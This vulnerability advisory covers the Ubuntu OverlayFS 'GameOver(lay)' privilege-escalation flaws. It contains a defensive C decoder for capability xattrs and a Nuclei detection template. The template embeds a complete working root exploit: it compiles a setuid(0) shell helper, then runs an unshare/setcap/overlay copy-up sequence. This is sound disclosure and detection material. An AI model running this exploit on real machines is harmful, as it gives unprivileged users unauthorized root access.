
GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel

GameOver(lay) is the name given to two vulnerabilities in the Ubuntu kernel, CVE-2023-2640 and CVE-2023-32629, each rated high severity with a CVSS score of 7.8 and together estimated to affect around 40% of Ubuntu users. Both flaws lie in Ubuntu's patched OverlayFS module and allow a local, unprivileged attacker to escalate to root on an unpatched system.

Technical Details

CVE-2023-2640: This vulnerability is specific to the way Ubuntu builds its kernels. It affects kernels that carry both upstream commit c914c0e27eb0 and the Ubuntu-specific patch "UBUNTU: SAUCE: overlayfs: Skip permission checking for trusted.overlayfs.* xattrs modifications". On such a kernel, an unprivileged user can set privileged extended attributes on files in an OverlayFS mount, and those attributes are written through to the upper (backing) files without the security checks that would normally apply. The result is that an unprivileged user can make the kernel persist attributes that only a privileged user should be able to set.

CVE-2023-32629: This is a local privilege escalation vulnerability in Ubuntu's OverlayFS. The flaw is in the ovl_copy_up_meta_inode_data function, which skips permission checks when it calls ovl_do_setxattr during copy-up. An attacker who is root inside their own user namespace can place an executable with file capabilities in the lower directory of an overlay mount; those capabilities are scoped to the attacker's namespace and are harmless there. When the attacker triggers a copy-up of that file, the Ubuntu kernel writes the capability attribute onto the upper file unscoped, so the copied-up binary carries real capabilities in the host namespace. Executing it outside the namespace therefore gives any local user the capabilities it was given, and with cap_setuid that is effectively root.
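The scoped versus unscoped distinction above is entirely a matter of which revision of the security.capability xattr ends up on the upper file. The following C program is an added example, not code from the original post or from the Nuclei template: it decodes that xattr using the on-disk layout of the kernel's struct vfs_cap_data (revision 2, 20 bytes) and vfs_ns_cap_data (revision 3, 24 bytes, with a trailing rootid), and reports whether a file carries CAP_SETUID that global root would honour. The two sample attribute values are constructed: the first is what setcap cap_setuid+eip writes from inside a user namespace whose root maps to host uid 1000 (a rootid of 1000 is an assumed mapping), the second is the unscoped revision-2 form that the vulnerable copy-up produces. On Linux the program also accepts file paths on the command line and classifies their real xattrs.

```c
/*
 * Decode a security.capability xattr and classify the CAP_SETUID it carries.
 * Added example; not the original post's or the Nuclei project's code.
 * Layout per the kernel's struct vfs_cap_data / vfs_ns_cap_data:
 *   u32 magic_etc; { u32 permitted; u32 inheritable; } data[2]; [u32 rootid]
 */
#include <stdint.h>
#include <stdio.h>
#include <string.h>
#ifdef __linux__
#include <sys/types.h>
#include <sys/xattr.h>
#endif

#define VFS_CAP_REVISION_MASK   0xFF000000u
#define VFS_CAP_REVISION_2      0x02000000u
#define VFS_CAP_REVISION_3      0x03000000u
#define VFS_CAP_FLAGS_EFFECTIVE 0x00000001u
#define XATTR_CAPS_SZ_2 20
#define XATTR_CAPS_SZ_3 24
#define CAP_SETUID 7

enum fcaps_verdict {
    FCAPS_INVALID = -1,        /* not a well-formed capability xattr */
    FCAPS_NO_SETUID = 0,       /* CAP_SETUID not in the permitted set */
    FCAPS_SETUID_SCOPED = 1,   /* v3 with rootid != 0: honoured only in that user namespace */
    FCAPS_SETUID_UNSCOPED = 2  /* v2, or v3 with rootid 0: honoured by global root */
};

struct fcaps {
    int revision;
    int effective;
    uint64_t permitted;
    uint64_t inheritable;
    uint32_t rootid;           /* kuid the caps are scoped to (v3 only); 0 for v2 */
};

static uint32_t le32(const unsigned char *p)
{
    return (uint32_t)p[0] | (uint32_t)p[1] << 8 | (uint32_t)p[2] << 16 | (uint32_t)p[3] << 24;
}

/* Parse raw xattr bytes; returns 0 on success, -1 on a bad magic or length. */
int fcaps_decode(const unsigned char *buf, size_t len, struct fcaps *out)
{
    memset(out, 0, sizeof *out);
    if (len < 4)
        return -1;
    uint32_t magic = le32(buf);
    size_t need;
    switch (magic & VFS_CAP_REVISION_MASK) {
    case VFS_CAP_REVISION_2: need = XATTR_CAPS_SZ_2; out->revision = 2; break;
    case VFS_CAP_REVISION_3: need = XATTR_CAPS_SZ_3; out->revision = 3; break;
    default: return -1;
    }
    if (len != need)
        return -1;
    out->effective = (magic & VFS_CAP_FLAGS_EFFECTIVE) != 0;
    /* data[0] covers caps 0..31, data[1] caps 32..63; each pair is {permitted, inheritable} */
    out->permitted   = (uint64_t)le32(buf + 4) | (uint64_t)le32(buf + 12) << 32;
    out->inheritable = (uint64_t)le32(buf + 8) | (uint64_t)le32(buf + 16) << 32;
    out->rootid = out->revision == 3 ? le32(buf + 20) : 0;
    return 0;
}

int fcaps_classify(const unsigned char *buf, size_t len)
{
    struct fcaps c;
    if (fcaps_decode(buf, len, &c) != 0)
        return FCAPS_INVALID;
    if (!(c.permitted & (1ull << CAP_SETUID)))
        return FCAPS_NO_SETUID;
    return (c.revision == 3 && c.rootid != 0) ? FCAPS_SETUID_SCOPED : FCAPS_SETUID_UNSCOPED;
}

/* Constructed sample: setcap cap_setuid+eip run inside a user namespace whose
 * root maps to host uid 1000 (assumed mapping) -> revision 3, rootid 1000. */
const unsigned char SAMPLE_V3_SCOPED[XATTR_CAPS_SZ_3] = {
    0x01, 0x00, 0x00, 0x03,   /* magic_etc: revision 3 | effective */
    0x80, 0x00, 0x00, 0x00,   /* data[0].permitted: bit 7 = CAP_SETUID */
    0x80, 0x00, 0x00, 0x00,   /* data[0].inheritable */
    0x00, 0x00, 0x00, 0x00,   /* data[1].permitted */
    0x00, 0x00, 0x00, 0x00,   /* data[1].inheritable */
    0xe8, 0x03, 0x00, 0x00    /* rootid = 1000 */
};
/* Constructed sample: the same caps after the vulnerable copy-up -> revision 2, no rootid. */
const unsigned char SAMPLE_V2_UNSCOPED[XATTR_CAPS_SZ_2] = {
    0x01, 0x00, 0x00, 0x02,
    0x80, 0x00, 0x00, 0x00,
    0x80, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00,
    0x00, 0x00, 0x00, 0x00
};

#ifdef __linux__
/* Classify a real file's xattr; FCAPS_INVALID if it has none or it is malformed. */
int fcaps_classify_path(const char *path)
{
    unsigned char buf[XATTR_CAPS_SZ_3];
    ssize_t n = getxattr(path, "security.capability", buf, sizeof buf);
    return n < 0 ? FCAPS_INVALID : fcaps_classify(buf, (size_t)n);
}
#endif

int main(int argc, char **argv)
{
    static const char *names[] = { "invalid / none", "no CAP_SETUID",
                                   "CAP_SETUID (namespace-scoped)", "CAP_SETUID (UNSCOPED)" };
    printf("constructed v3 sample: %s\n", names[fcaps_classify(SAMPLE_V3_SCOPED, sizeof SAMPLE_V3_SCOPED) + 1]);
    printf("constructed v2 sample: %s\n", names[fcaps_classify(SAMPLE_V2_UNSCOPED, sizeof SAMPLE_V2_UNSCOPED) + 1]);
#ifdef __linux__
    for (int i = 1; i < argc; i++)
        printf("%s: %s\n", argv[i], names[fcaps_classify_path(argv[i]) + 1]);
#else
    (void)argc; (void)argv;
#endif
    return 0;
}
```

Run it against the upper directory of a suspect overlay (for example `./fcaps /tmp/u/test`): a binary that reports "UNSCOPED" outside the namespace that created it is exactly the post-copy-up state the exploit relies on, whereas a correctly patched kernel leaves the revision-3 form with a non-zero rootid.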

Nuclei Template

```yaml
id: CVE-2023-2640

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  tags: packetstorm,cve,cve2023,kernel,ubuntu,linux,privesc,local

self-contained: true
code:
  # Baseline: record who we are before the exploit so the matcher can require
  # that we were not root to begin with.
  - engine:
      - sh
      - bash
    source: |
      id

  - engine:
      - sh
      - bash
    source: |
      cd /tmp
      # printf '%b' expands the \n escapes under both dash and bash (plain echo only does under dash).
      printf '%b\n' '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p -c id") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
      gcc test.c -o test
      # Inside an unprivileged user namespace we are "root", so we can setcap the lower
      # file and mount the overlay; touching the merged file forces a copy-up to upperdir.
      # The copied-up binary must then run OUTSIDE the namespace: inside it, id always
      # reports uid=0(root), so only an outside "(root)" proves the capability was unscoped.
      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test" && ./u/test

    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "(root)")'
          - 'contains(code_2_response, "(root)")'
        condition: and
```

Timeline

The vulnerabilities were fixed by Ubuntu as of July 24, 2023, following responsible disclosure.

Remediation

Users are recommended to apply the kernel updates provided by Ubuntu and reboot into the fixed kernel. Exploiting either vulnerability requires creating a user namespace and an OverlayFS mount, so an attacker needs local code execution on the target; remote exploitation is unlikely. Where the update cannot be applied immediately, disabling unprivileged user namespace creation (sysctl kernel.unprivileged_userns_clone=0 on Ubuntu kernels that provide it) removes the unprivileged path to the overlay mount, at the cost of breaking software that depends on user namespaces, such as rootless containers and some application sandboxes.
